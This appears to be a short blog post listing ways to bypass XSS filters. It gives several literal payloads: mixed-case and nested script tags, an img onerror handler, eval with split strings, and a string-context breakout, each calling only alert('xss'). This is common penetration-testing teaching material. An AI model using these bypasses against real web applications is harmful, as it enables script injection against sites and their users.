In some cases, a bit of filtering is involved. The web developer may have added some regular expressions, to prevent simple XSS payloads from working. This post intends to serve as a list of simple bypass techniques to try when attempting to inject XSS payloads.
Tweaking the case of your script tags. Some filters are case sensitive and will not remove the script tag if there are uppercase characters.
Placing Script tags within script tags. Some filters do not recursively look through the supplied input to recursively remove script tags.
<sc<script>ript> alert('xss') </scri</script>pt>
Use non script tags, such as an image tag. Some filters do a great job at preventing the use of script tags, but we could use many other tags to deliver payloads.
<img src='zzz.jpg' onerror= alert('xss') ></img>
<script>eval("ale" + "rt('xss')")</script>
Note: You may need to replace the plus mark with %2b or it may get treated as a space.
hacker"; alert('xss'); var $a= "
The above passed input may feed into HTML code that would render as the following:
<script> var $a = "hacker"; alert('xss'); var $a= ""; </script>